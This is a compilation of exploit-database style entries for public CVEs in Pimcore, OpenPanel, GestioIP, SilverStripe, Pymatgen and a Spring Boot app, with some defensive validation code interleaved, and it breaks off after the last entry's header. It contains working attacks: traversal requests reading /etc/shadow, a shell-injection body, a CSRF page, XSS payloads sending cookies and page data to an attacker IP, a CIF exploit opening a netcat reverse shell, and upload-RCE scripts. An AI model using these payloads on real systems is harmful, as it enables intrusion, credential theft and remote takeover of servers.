
# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956

import requests

# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)

if "Login successful" in login_response.text:
    print("[+] Authenticated successfully.")

    # Exploit the downloadAsZip functionality
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"]  # Replace with IDs of restricted files/folders
    }
    download_response = session.post(download_url, data=payload)

    if download_response.status_code == 200:
        print("[+] Exploit successful. Restricted files downloaded.")
        with open("restricted_files.zip", "wb") as f:
            f.write(download_response.content)
    else:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
    print("[-] Authentication failed.")
            
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
            
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal 
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537

### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar

### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers


###  Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers


### View Function ### 
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
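Every request above (compress, copy, download, view, and the `/files/../..` listing) supplies a `path_param` and a file name that the server joins onto a user directory. The containment check below is an added defensive example, not OpenPanel's code; `USER_ROOT` is a constructed per-user root and the check is purely lexical.

```python
import posixpath

# Constructed for the demo: the per-user root that every file-manager request
# must stay inside (a real app would take this from the authenticated session).
USER_ROOT = "/home/stefan"


def resolve_user_path(root, path_param, filename=""):
    """Combine the per-user root with untrusted path_param / filename values
    and return an absolute path inside root, or None if the request escapes.

    Rejects absolute path_param values (the '/etc' case), dot-dot escapes
    ('../../etc', '/files/../..') and filenames that are not a single path
    component. The check is lexical; when the paths exist on disk, also run
    the result through os.path.realpath so symlinks cannot bypass it."""
    if not isinstance(path_param, str) or not isinstance(filename, str):
        return None
    if "\x00" in path_param or "\x00" in filename:
        return None
    if posixpath.isabs(path_param):
        return None
    # filename must name exactly one entry in the directory, nothing more.
    if filename and (posixpath.basename(filename) != filename or filename in (".", "..")):
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, path_param, filename))
    # Containment test: either the root itself or something strictly below it.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


def classify_request(path_param, filename=""):
    """Helper for logging or alerting: 'ok' for contained requests,
    'traversal' when the request tries to leave the user's root."""
    return "ok" if resolve_user_path(USER_ROOT, path_param, filename) else "traversal"
```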
            
# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search Document
# Google Dork: N/A
# Date: 1/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
# CVE:  CVE-2024-11954

---

### Description:
A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data
Object Classification Store functionality. The vulnerability arises due to
insufficient input sanitization, allowing an authenticated attacker with
access to the classification store to inject malicious JavaScript code.
This code is then executed in the context of other users' browsers when
they view the affected data.

### Proof of Concept (PoC):
1. Log in to the Pimcore backend as a user with access to the Data Object
Classification Store.
2. Navigate to the Classification Store and create or edit a key.
3. Inject the following payload into the key value:
   ```html
   <script>alert('XSS')</script>
   ```
4. Save the file and view it in the frontend or backend. The JavaScript
alert will execute, demonstrating the vulnerability.
            
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
            
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection 
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584

POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt
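The `timezone` value above reaches a shell unvalidated. The handler below is an added defensive example (not OpenPanel's code): it accepts only syntactically valid IANA zone names, confirms them against the system tz database when one is present, and applies the zone through an argv list rather than a shell string. The `runner` parameter is injectable so the logic can be exercised without touching the host.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# IANA zone names: Area/Location[/Sub] built from letters, digits, '_', '+', '-'.
# No '.', so '..' can never appear, and no shell metacharacters at all.
IANA_ZONE = re.compile(r"[A-Za-z][A-Za-z0-9_+\-]*(?:/[A-Za-z0-9_+\-]+){0,2}")


def validate_timezone(value):
    """Return the zone name if it is syntactically an IANA zone and, when the
    system tz database is available, actually exists in it; otherwise None."""
    if not isinstance(value, str) or not 0 < len(value) <= 64:
        return None
    if not IANA_ZONE.fullmatch(value):
        return None
    try:
        import zoneinfo
        known = zoneinfo.available_timezones()  # empty set if no tzdata installed
    except Exception:
        known = set()
    if known and value not in known:
        return None
    return value


def handle_timezone_request(value, runner=subprocess.run):
    """Validate, then apply with shell=False: argv[2] is data, never parsed by /bin/sh.
    Returns ('ok', argv) or ('rejected', None)."""
    zone = validate_timezone(value)
    if zone is None:
        return ("rejected", None)
    argv = ["timedatectl", "set-timezone", zone]
    runner(argv, check=True)
    return ("ok", argv)


def audit_timezone_submissions(values):
    """Detection helper for log review: the submitted values that fail
    validation are the ones worth alerting on."""
    return [v for v in values if validate_timezone(v) is None]


# Constructed sample: the request body from the advisory as the server sees it
# after form decoding.
SAMPLE_BODY_VALUE = unquote_plus(";cat+/etc/shadow+>+/home/stefan/secret.txt")
```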
            
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

The GestioIP application exposes many endpoints that are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must already be enabled.


### Usage

To exploit this vulnerability, an attacker must host `payload.html` on an attacker-controlled web server (for example `python3 -m http.server 8090`). When an authenticated administrator visits the attacker's website, the CSRF request executes, making the attacker an administrator.


### File: payload.html
#### example: editing user named 'maxi'


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->

<iframe name="hiddenFrame"></iframe>

<!-- The form that makes the POST to GestioIP Server -->
<form action="http://localhost/gestioip/res/ip_mod_user.cgi" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="maxi@test.com">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
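The hidden-iframe form above succeeds because `ip_mod_user.cgi` accepts any POST that carries the admin's session cookie. The gate below is an added example of the standard defence, written in Python rather than GestioIP's Perl and not part of the project: a session-bound synchronizer token plus an Origin/Referer check. `CSRF_KEY` and `APP_ORIGIN` are constructed values.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed for the demo: server-side key and the origin the app is served from.
CSRF_KEY = secrets.token_bytes(32)
APP_ORIGIN = "http://localhost"


def issue_csrf_token(session_id):
    """Token bound to the session: nonce + HMAC(session_id, nonce). Embedded as a
    hidden field in every state-changing form the server renders."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(CSRF_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """A cross-site page cannot read the token, so it cannot forge this field."""
    if not isinstance(token, str) or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    expected = hmac.new(CSRF_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_allowed(headers):
    """Browsers attach Origin (or at least Referer) to cross-site form POSTs;
    a state-changing request with neither, or from a foreign origin, is refused."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == APP_ORIGIN


def accept_user_modification(session_id, headers, form):
    """Gate for a handler such as ip_mod_user.cgi: both checks must pass."""
    return origin_allowed(headers) and verify_csrf_token(session_id, form.get("csrf_token"))
```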
            
# Exploit Title: SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 2025-01-15
# Exploit Author: James Nicoll
# Vendor Homepage: https://www.silverstripe.org/
# Software Link: https://www.silverstripe.org/download/
# Category: Web Application
# Version: 5.2.22
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
# CVE : CVE-2024-47605

## Explanation:
When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.

## Requirements
1. A Silverstripe CMS website.
2. Valid login credentials for a user with page edit rights.
3. An attacker server hosting malicious payload.

## On the attacker server:
1. Create an HTML file with oEmbed discovery information:
```
<html>
  <head>
    <link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
  </head>
  <body>
    <img src="media.jpg">
  </body>
</html>
```
2. Create the json file with XSS payload:
```
{
    "title": "Title",
    "author_name": "author",
    "type": "video",
    "height": 113,
    "width": 200,
    "version": "1.0",
    "provider_name": "FakeSite",
    "thumbnail_height": 360,
    "thumbnail_width": 480,
    "thumbnail_url": "http://<attacker_server_ip>/media.jpg",
    "html":"<script>alert('hello world');</script>"
}
```
3. The media.jpg file can be any image.
4. Host these files on a publicly available website.

## On the SilverStripe website:
1. Log into the admin portal with a user account that has page editor rights (or higher).
2. Select the page you wish to load the malicious content into.
3. Within the editor panel, select the "Insert Media via URL" button.
4. Enter the IP/Hostname of the attacker server.
5. Click Add Media, Insert Media, and then save and publish the page.
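The root cause is that the provider-supplied `html` field is inserted verbatim. The filter below is an added example of how a CMS can consume an oEmbed response safely; it is not SilverStripe code. It never inserts the provider's `html`: for `video`/`rich` responses the markup is accepted only if it is exactly one `<iframe>` pointing at a trusted https host, and the tag is regenerated from that `src`. `TRUSTED_EMBED_HOSTS` is an assumed allowlist.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption for the demo: the providers whose players the site is willing to frame.
TRUSTED_EMBED_HOSTS = {"www.youtube.com", "player.vimeo.com"}


def _trusted_https_url(url):
    parts = urlsplit(url or "")
    return parts.scheme == "https" and parts.hostname in TRUSTED_EMBED_HOSTS


class _EmbedInspector(HTMLParser):
    """Records every start tag, iframe src values, and any attribute that could
    run script (on* handlers, srcdoc, javascript: URLs)."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.iframe_srcs = []
        self.dangerous = False

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on") or lname == "srcdoc":
                self.dangerous = True
            if lname in ("src", "href") and (value or "").strip().lower().startswith("javascript:"):
                self.dangerous = True
        if tag == "iframe":
            self.iframe_srcs.append(dict(attrs).get("src") or "")


def safe_embed_markup(oembed_json_text):
    """Return markup rebuilt from vetted fields of an oEmbed response, or None
    when the response cannot be embedded safely."""
    try:
        data = json.loads(oembed_json_text)
    except ValueError:
        return None
    if not isinstance(data, dict):
        return None
    width, height = data.get("width"), data.get("height")
    if not (type(width) is int and type(height) is int and 0 < width <= 4096 and 0 < height <= 4096):
        return None
    kind = data.get("type")
    if kind == "photo":
        url = data.get("url")
        if not isinstance(url, str) or not _trusted_https_url(url):
            return None
        return f'<img src="{html.escape(url, quote=True)}" width="{width}" height="{height}" alt="">'
    if kind not in ("video", "rich"):
        return None
    markup = data.get("html")
    if not isinstance(markup, str) or len(markup) > 4096:
        return None
    inspector = _EmbedInspector()
    inspector.feed(markup)
    inspector.close()
    if inspector.dangerous or inspector.tags != ["iframe"] or len(inspector.iframe_srcs) != 1:
        return None
    src = inspector.iframe_srcs[0]
    if not _trusted_https_url(src):
        return None
    # Regenerated tag: only the vetted src and integer dimensions survive.
    return (f'<iframe src="{html.escape(src, quote=True)}" width="{width}" height="{height}" '
            'sandbox="allow-scripts allow-same-origin" allowfullscreen></iframe>')


def make_oembed(**fields):
    """Constructed helper: build an oEmbed JSON document for testing."""
    return json.dumps(fields)


# Constructed sample: the advisory's JSON with the attacker host replaced by a placeholder.
ADVISORY_OEMBED = make_oembed(
    title="Title", author_name="author", type="video", height=113, width=200,
    version="1.0", provider_name="FakeSite", thumbnail_height=360, thumbnail_width=480,
    thumbnail_url="http://attacker.invalid/media.jpg",
    html="<script>alert('hello world');</script>",
)
```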
            
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50861

### Description

The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.

### Prerequisites

1. Enable "DNS Key" Feature
First, ensure that "Dynamic DNS updates" is enabled in the global configuration:

Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes

This will enable the following menus:

    Manage > DNS Keys
    Manage > DNS Update User

2. Create a DNS Key Entry

To create a new DNS key entry or edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, the "Admin" and "GestioIP Admin" groups have this permission.

Also, you can configure this permission to any group under:

Manage > User Groups > Manage Sites and Categories

3. Enter payload.

Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.


### Payloads

1 - Test basic XSS

<script>alert("test")</script>


2 - Send data (cookies) to the attacker's server

<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">


3 - Redirect the user to a malicious site

<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">
            
# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859

### Description

The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting): the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the uploaded file has an incorrect format and an error occurs during its processing, part of the file's content is displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser interprets it, leading to a security vulnerability. This can allow data exfiltration and enable CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.


### Prerequisites

Enable (set to 'yes') the parameter:

Manage > Manage GestioIP > ACL connection management


### Usage

Select: import/export > Import ACLs/ACL Connections

Select: "Connection List"

Select "report only"

Browse to select the file you want to upload.

Click 'upload'



### Payloads

#### 1) html file to upload

<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>


#### 2) js file to exfiltrate data

var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();

response = req1.responseText;

var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);
            
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https://pymatgen.org
# Software Link : https://pypi.org/project/pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """
    
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")
    
    # Create the malicious CIF file
    create_malicious_cif(ip, port)
    
    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()

# Running the exploit
if __name__ == "__main__":
    exploit()
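The payload above hides a Python expression inside `_space_group_magn.transform_BNS_Pp_abc`, a field whose legitimate values are transformation strings of the form `a,b,c;0,0,0` (an axis expression per component, then a rational origin shift). The parser below is an added example of reading that field under a restricted grammar with no evaluation at all; it is not pymatgen's code. `ADVISORY_PAYLOAD` is a constructed, shortened copy of the advisory's string.

```python
import re
from fractions import Fraction

_TOKEN = re.compile(r"\s*(?:([+-])|(\d+(?:/\d+)?)|([abc])|(\*))")
_SHIFT = re.compile(r"[+-]?\d+(?:/\d+)?")


def _parse_linear(expr):
    """Parse one component such as 'a', '-b', 'a+b', '2a-c' or '1/2*a' into
    (coef_a, coef_b, coef_c). Anything outside this grammar raises ValueError."""
    coeffs = {"a": Fraction(0), "b": Fraction(0), "c": Fraction(0)}
    expr = expr.strip()
    pos, sign, number, pending, seen_var = 0, 1, None, False, False
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"illegal character at offset {pos} in {expr!r}")
        pos = m.end()
        op, num, var, star = m.groups()
        if op:
            if pending or number is not None:
                raise ValueError("misplaced sign")
            sign, pending = (1 if op == "+" else -1), True
        elif num:
            if number is not None:
                raise ValueError("two numbers in a row")
            try:
                number = Fraction(num)
            except ZeroDivisionError:
                raise ValueError("zero denominator") from None
        elif star:
            if number is None:
                raise ValueError("'*' without a coefficient")
        else:
            coeffs[var] += sign * (number if number is not None else Fraction(1))
            sign, number, pending, seen_var = 1, None, False, True
    if pending or number is not None or not seen_var:
        raise ValueError(f"incomplete expression {expr!r}")
    return (coeffs["a"], coeffs["b"], coeffs["c"])


def parse_transformation(text):
    """Parse 'a,b,c;0,0,0' into (components, shift): three coefficient triples
    and three rational shifts, all Fractions. No names other than a, b, c exist."""
    if not isinstance(text, str) or not 0 < len(text) <= 200:
        raise ValueError("transformation string missing or too long")
    lhs, _, rhs = text.partition(";")
    columns = lhs.split(",")
    if len(columns) != 3:
        raise ValueError("expected three comma-separated components")
    components = [_parse_linear(col) for col in columns]
    if rhs.strip():
        parts = [p.strip() for p in rhs.split(",")]
        if len(parts) != 3 or not all(_SHIFT.fullmatch(p) for p in parts):
            raise ValueError("expected three rational origin-shift components")
        try:
            shift = [Fraction(p) for p in parts]
        except ZeroDivisionError:
            raise ValueError("zero denominator in origin shift") from None
    else:
        shift = [Fraction(0)] * 3
    return components, shift


def is_safe_transformation(text):
    """True when the string parses under the restricted grammar. Usable as a
    pre-check on CIF input before handing it to a parser you do not fully trust."""
    try:
        parse_transformation(text)
        return True
    except ValueError:
        return False


# Constructed sample: the beginning of the payload quoted in the advisory.
ADVISORY_PAYLOAD = "a,b,[d for d in ().__class__.__mro__[1]];0,0,0"
```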
            
# Exploit Title: Unrestricted File Upload
# Google Dork:
# Date: 14/Nov/2024
# Exploit Author: d3sca
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
# Version: 0.1
# Tested on: Debian Linux
# CVE : CVE-2024-52302


# Steps to Reproduce:

# 1. Upload a malicious file: send a PUT request to /api/v1/customer/profile-picture as a customer (role 26,17) with a malicious file payload (e.g., .jsp, .php, .html).

# 2. Get the file location: send a GET request to /api/v1/customer/my-profile and grab the file location (the profile picture link) from the response.

# 3. Execute the uploaded file: access the file directly through the URL returned in the response.
# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.


import requests
import argparse
import sys


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def login(url, username, password):
    """Authenticate with the API and return the Bearer token."""
    login_endpoint = f"{url}/api/v1/user/login"
    headers = {"Content-Type": "application/json"}
    payload = {
        "username": username,
        "password": password
    }

    try:
        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
        response.raise_for_status()

        # Extract token
        token = response.json().get("token")
        if not token:
            print("[!] Token not found in response. Exiting.")
            sys.exit(1)

        print("[+] Authentication successful. Token acquired.")
        return token
    except Exception as e:
        print(f"[!] Login failed: {e}")
        sys.exit(1)

def upload_file(url, token, file_path):
    """Upload a file to the profile picture endpoint using the Bearer token."""
    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
    headers = {
        "Authorization": f"Bearer {token}"
    }
    files = {
        "file": open(file_path, "rb")
    }

    try:
        response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
        response.raise_for_status()

        if response.status_code == 200:
            print("[+] File uploaded successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[!] Failed to upload file. Status code: {response.status_code}")
            print(f"[!] Response: {response.text}")
    except Exception as e:
        print(f"[!] File upload failed: {e}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
    parser.add_argument("-u", "--username", required=True, help="Username for login")
    parser.add_argument("-p", "--password", required=True, help="Password for login")
    parser.add_argument("-f", "--file", required=True, help="File to upload")
    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")

    args = parser.parse_args()

    # Authenticate 
    token = login(args.url, args.username, args.password)

    # Upload the file
    upload_file(args.url, token, args.file)

if __name__ == "__main__":
    main()
            
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
